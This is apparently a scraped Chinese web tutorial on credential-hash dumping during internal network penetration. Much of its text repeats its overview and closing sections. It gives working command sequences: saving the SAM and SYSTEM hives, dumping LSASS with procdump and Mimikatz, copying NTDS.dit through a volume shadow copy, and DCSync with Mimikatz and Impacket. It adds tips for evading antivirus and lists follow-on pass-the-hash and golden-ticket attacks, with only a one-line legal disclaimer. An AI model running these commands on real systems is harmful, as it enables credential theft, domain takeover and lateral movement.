内网渗透中HASH导出技术详解<\/h1>

1. 概述<\/h2>
在内网渗透中，当获取到高权限用户身份后，抓取系统密码HASH是横向移动的关键步骤。本文详细讲解如何导出本地机器和域环境中的密码HASH。<\/p>

2. 本地HASH导出技术<\/h2>

2.1 SAM文件提取<\/h3>

Windows系统将本地账户密码HASH存储在SAM文件中，位于：<\/p>

%SystemRoot%\system32\config\SAM
<\/code><\/pre>
提取方法：<\/p>

使用reg命令备份SAM文件：<\/li>
<\/ol>
reg save HKLM\SAM sam.hive
reg save HKLM\SYSTEM system.hive
<\/code><\/pre>

使用工具解析：<\/li>
<\/ol>

Mimikatz：<\/li>
<\/ul>
lsadump::sam \/sam:sam.hive \/system:system.hive
<\/code><\/pre>

Impacket的secretsdump.py：<\/li>
<\/ul>
secretsdump.py -sam sam.hive -system system.hive LOCAL
<\/code><\/pre>
2.2 LSASS进程内存转储<\/h3>
LSASS进程内存中可能包含明文凭据和HASH：<\/p>

使用Procdump转储：<\/li>
<\/ol>
procdump.exe -accepteula -ma lsass.exe lsass.dmp
<\/code><\/pre>

使用Mimikatz解析：<\/li>
<\/ol>
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full
<\/code><\/pre>

直接使用Mimikatz提取：<\/li>
<\/ol>
privilege::debug
sekurlsa::logonpasswords
<\/code><\/pre>
3. 域HASH导出技术<\/h2>
3.1 NTDS.dit文件提取<\/h3>
域控的NTDS.dit文件包含所有域用户HASH：<\/p>

卷影复制提取：<\/li>
<\/ol>
vssadmin create shadow \/for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\ntds.dit
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\system.hive
<\/code><\/pre>

使用Impacket解析：<\/li>
<\/ol>
secretsdump.py -ntds ntds.dit -system system.hive LOCAL
<\/code><\/pre>
3.2 DCSync攻击<\/h3>
利用域控复制功能获取HASH：<\/p>

使用Mimikatz：<\/li>
<\/ol>
lsadump::dcsync \/domain:domain.com \/all
<\/code><\/pre>

使用Impacket：<\/li>
<\/ol>
secretsdump.py domain.com\/user@dc.domain.com -just-dc
<\/code><\/pre>
4. 防御规避技术<\/h2>
4.1 绕过杀毒软件<\/h3>

使用白名单进程：<\/li>
<\/ol>

如sqlps.exe加载Mimikatz<\/li>
使用rundll32执行恶意DLL<\/li>
<\/ul>

内存注入技术：<\/li>
<\/ol>

将Mimikatz注入到合法进程<\/li>
使用Cobalt Strike等C2框架的内存加载功能<\/li>
<\/ul>

自定义工具：<\/li>
<\/ol>

修改Mimikatz源码规避特征检测<\/li>
使用.NET实现的替代工具如SafetyKatz<\/li>
<\/ul>
5. 注意事项<\/h2>

权限要求：<\/li>
<\/ol>

本地HASH导出需要管理员权限<\/li>
DCSync需要域管理员或类似权限<\/li>
<\/ul>

防护措施：<\/li>
<\/ol>

Bitdefender等高级防护可能阻止HASH导出<\/li>
启用Credential Guard会阻止LSASS内存读取<\/li>
<\/ul>

日志记录：<\/li>
<\/ol>

DCSync操作会在域控生成4662事件日志<\/li>
LSASS访问会触发4688等进程创建日志<\/li>
<\/ul>
6. 后续利用<\/h2>
获取HASH后可进行：<\/p>

Pass-the-Hash攻击<\/li>
黄金票据\/白银票据攻击<\/li>
横向移动到其他系统<\/li>
<\/ol>
以上技术仅限授权测试使用，未经授权使用可能违反法律。<\/p>

内网渗透中HASH导出技术详解<\/h1>

1. 概述<\/h2> 在内网渗透中，当获取到高权限用户身份后，抓取系统密码HASH是横向移动的关键步骤。本文详细讲解如何导出本地机器和域环境中的密码HASH。<\/p>

2. 本地HASH导出技术<\/h2>

3. 域HASH导出技术<\/h2>

4. 防御规避技术<\/h2>

6. 后续利用<\/h2> 获取HASH后可进行：<\/p> Pass-the-Hash攻击<\/li> 黄金票据\/白银票据攻击<\/li> 横向移动到其他系统<\/li> <\/ol> 以上技术仅限授权测试使用，未经授权使用可能违反法律。<\/p>

1. 概述<\/h2>
在内网渗透中，当获取到高权限用户身份后，抓取系统密码HASH是横向移动的关键步骤。本文详细讲解如何导出本地机器和域环境中的密码HASH。<\/p>

6. 后续利用<\/h2>
获取HASH后可进行：<\/p>

Pass-the-Hash攻击<\/li>
黄金票据\/白银票据攻击<\/li>
横向移动到其他系统<\/li> <\/ol>
以上技术仅限授权测试使用，未经授权使用可能违反法律。<\/p>